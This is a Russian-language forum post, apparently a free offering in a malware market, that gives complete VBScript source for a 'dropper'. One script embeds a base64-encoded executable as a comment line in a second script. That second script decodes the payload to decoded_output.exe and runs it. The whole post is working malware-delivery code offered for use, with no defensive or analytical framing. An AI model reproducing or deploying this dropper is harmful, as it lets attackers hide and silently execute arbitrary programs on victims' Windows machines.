VBS dropper FREE

[MrBang]

Цена

0

Контакты

DAB30747E4650B1D71A30E199FE07AED62239661B7EFA109AFA8E0821690D12B2FF84CE2A114

И так знач, устал я от рутинной работы, и как выдалась свободная минутка, создал дроппер вбс.
Кратко, конвертируем файл в base64, записываем как комент в первую строку, затем расшифровываем дропаем и запускаем.

start.vbs

Dim objFSO, strFilePath, byteData, base64Encoded, stream, filePath, additionalText
strFilePath = "putty.exe" 

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set stream = CreateObject("ADODB.Stream")
byteData = ReadBinaryFile(strFilePath)
base64Encoded = EncodeBase64(byteData)

base64Encoded = Replace(base64Encoded, vbCrLf, "")
base64Encoded = Replace(base64Encoded, vbLf, "")
base64Encoded = Replace(base64Encoded, vbCr, "")

objFSO.CopyFile "tmp.vbs","2.vbs",True
filePath = "2.vbs"

additionalText = "'"&base64Encoded


stream.Type = 2
stream.Charset = "utf-16"
stream.Open
On Error Resume Next
stream.LoadFromFile filePath
On Error GoTo 0

stream.Position = stream.Size
stream.WriteText vbCrLf & additionalText

stream.SaveToFile filePath, 2
stream.Close

Function ReadBinaryFile(filePath)
    Dim stream
    Set stream = CreateObject("ADODB.Stream")
    stream.Type = 1
    stream.Open
    stream.LoadFromFile(filePath)
    ReadBinaryFile = stream.Read()
    stream.Close
    Set stream = Nothing
End Function


Function EncodeBase64(data)
    Dim objXML, objNode
    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.CreateElement("base64")
    objNode.DataType = "bin.base64"
    objNode.NodeTypedValue = data
    EncodeBase64 = objNode.Text
    Set objNode = Nothing
    Set objXML = Nothing
End Function

tmp.vbs

Dim objFSO, objFile, base64Data, decodedData, filePathOutput, lastLine, remainingLine, allLines

Set objFSO = CreateObject("Scripting.FileSystemObject")
currentScriptPath = WScript.ScriptFullName
Set objFile = objFSO.OpenTextFile(currentScriptPath, 1, False, -1)
allLines = objFile.ReadAll
objFile.Close
Dim lines
lines = Split(allLines, vbCrLf)
lastLine = lines(UBound(lines))
If Len(lastLine) > 0 Then
    remainingLine = Mid(lastLine, 2)
Else
    remainingLine = ""
End If

filePathOutput = "decoded_output.exe"
base64Data = remainingLine
decodedData = DecodeBase64(base64Data)
WriteBinaryFile filePathOutput, decodedData
CreateObject("WScript.Shell").Run "decoded_output.exe"

Function DecodeBase64(base64String)
    Dim xmlObj, nodeObj
    Set xmlObj = CreateObject("MSXML2.DOMDocument")
    Set nodeObj = xmlObj.createElement("base64")
    nodeObj.dataType = "bin.base64"
    nodeObj.Text = base64String
    DecodeBase64 = nodeObj.nodeTypedValue
    Set nodeObj = Nothing
    Set xmlObj = Nothing
End Function

Sub WriteBinaryFile(filePath, binaryData)
    Dim stream
    Set stream = CreateObject("ADODB.Stream")
    stream.Type = 1
    stream.Open
    stream.Write binaryData
    stream.SaveToFile filePath, 2
    stream.Close
    Set stream = Nothing
End Sub